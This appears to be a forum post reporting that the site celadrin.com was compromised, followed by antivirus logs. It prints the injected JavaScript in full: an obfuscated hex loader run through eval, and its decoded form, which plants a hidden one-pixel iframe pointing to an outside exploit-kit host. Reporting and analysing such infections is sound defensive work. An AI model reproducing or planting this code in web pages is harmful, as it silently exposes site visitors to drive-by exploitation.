http://www.celadrin.com/testimonials_softgels.php

fireold

1. /*d04bb5*/
   
2. try {
   
3.     if (window.document)--document.getElementById('12')
   
4. } catch (qq) {
   
5.     if (qq != null) ss = eval("St" + "ring");
   
6. }
   
7. a = "2e74837c7182777d7c2e88888874747436372e891b182e846f802e832e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e833c8180712e4b2e357682827e483d3d747780818273727573737c827380826f777c7b737c823c717d7b3d78813d6271875f557b65853c7e767e35491b182e833c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e833c8182877a733c707d807273802e4b2e353e35491b182e833c8182877a733c7673777576822e4b2e353f7e8635491b182e833c8182877a733c85777282762e4b2e353f7e8635491b182e833c8182877a733c7a7374822e4b2e353f7e8635491b182e833c8182877a733c827d7e2e4b2e353f7e8635491b181b182e77742e362f727d71837b737c823c757382537a737b737c82508757723635833537372e891b182e727d71837b737c823c858077827336354a7277842e77724b6a35836a354c4a3d7277844c3537491b182e727d71837b737c823c757382537a737b737c825087577236358335373c6f7e7e737c725176777a72368337491b182e8b1b188b1b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e891b182e846f802e827d726f872e4b2e7c73852e526f82733637491b182e846f802e73867e7780732e4b2e7c73852e526f82733637491b182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f491b182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f878137491b182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a8373371b182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e303037491b188b1b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e891b182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e37491b182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f491b182e77742e362e362e2f81826f80822e372e34341b182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e371b182e891b182e80738283807c2e7c837a7a491b182e8b1b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a491b182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e37491b182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c758276491b182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";
   
8. z = [];
   
9. for (i = 0; i < a.length; i += 2) {
   
10.     z.push(parseInt(a.substr(i, 2), 16) - 14);
    
11. }
    
12. eval(ss["fr" + "omCharCode"].apply(ss, z)); /*/d04bb5*/

复制代码

1. function zzzfff() {
   
2.      var u = document.createElement('iframe');
   
3. 
   
4.      u.src = 'http://firstedgeentertainment.com/js/TcyQGmWw.php';
   
5.      u.style.position = 'absolute';
   
6.      u.style.border = '0';
   
7.      u.style.height = '1px';
   
8.      u.style.width = '1px';
   
9.      u.style.left = '1px';
   
10.      u.style.top = '1px';
    
11. 
    
12.      if (!document.getElementById('u')) {
    
13.          document.write('<div id=\'u\'></div>');
    
14.          document.getElementById('u').appendChild(u);
    
15.      }
    
16. }
    
17. 
    
18. function SetCookie(cookieName, cookieValue, nDays, path) {
    
19.      var today = new Date();
    
20.      var expire = new Date();
    
21.      if (nDays == null || nDays == 0) nDays = 1;
    
22.      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    
23.      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
    
24. }
    
25. 
    
26. function GetCookie(name) {
    
27.      var start = document.cookie.indexOf(name + "=");
    
28.      var len = start + name.length + 1;
    
29.      if ((!start) && (name != document.cookie.substring(0, name.length))) {
    
30.          return null;
    
31.      }
    
32.      if (start == -1) return null;
    
33.      var end = document.cookie.indexOf(";", len);
    
34.      if (end == -1) end = document.cookie.length;
    
35.      return unescape(document.cookie.substring(len, end));
    
36. }
    
37. if (navigator.cookieEnabled) {
    
38.      if (GetCookie('visited_uq') == 55) {} else {
    
39.          SetCookie('visited_uq', '55', '1', '/');
    
40. 
    
41.          zzzfff();
    
42.      }
    
43. }

复制代码

Avira

2014/2/1 下午 05:48 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描.]。
      檔案數：        802
      目錄數：        0
      惡意程式碼數：        2
      警告數：        0

2014/2/1 下午 05:48 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\common[2].js'
      包含病毒或有害的程式 'JS/Quidvetis.A' [virus]
      已採取動作：
      檔案會移動至 '5c386d4d.qua' 名稱底下的隔離區目錄!

2014/2/1 下午 05:48 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描.]。
      檔案數：        802
      目錄數：        0
      惡意程式碼數：        3
      警告數：        0

2014/2/1 下午 05:48 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6TI8XMAJ\AJS[1].js'
      包含病毒或有害的程式 'JS/Quidvetis.A' [virus]
      已採取動作：
      檔案會移動至 '1696186d.qua' 名稱底下的隔離區目錄!

2014/2/1 下午 05:48 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\jsTabs[1].js'
      包含病毒或有害的程式 'JS/Quidvetis.A' [virus]
      已採取動作：
      檔案會移動至 '44b642ee.qua' 名稱底下的隔離區目錄!

2014/2/1 下午 05:47 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6TI8XMAJ\images[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作：傳輸至掃描程式

2014/2/1 下午 05:47 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6TI8XMAJ\images[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作：拒絕存取

2014/2/1 下午 05:47 [Web Protection] 發現惡意程式碼
      從 URL "http://www.celadrin.com/js/images.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.EB.46' [virus]。
      已採取動作：已略過

fs is



Sophos

****************** Sophos Anti-Virus 日誌紀錄 - 2014/2/1 上午 09:46:32 **************

    ...
20140201 094447        使用者 WILLIAM\alan 的網頁要求 "firstedgeentertainment.com/js/TcyQGmWw.php" (從 "www.celadrin.com/testimonials_softgels.php" 連結)  已受到攔截。已在此網站發現 'Mal/HTMLGen-A'，索引 ID 156111299。
20140201 094450        存取路徑 "victoryworshipint.us/fr/556177304.aspx" 受到攔截，受攔截的使用者為 WILLIAM\alan
20140201 094450        在 "victoryworshipint.us/fr/556177304.aspx" 上偵測到 病毒/間諜程式 'Troj/ExpJS-KX'
      (3 個項目)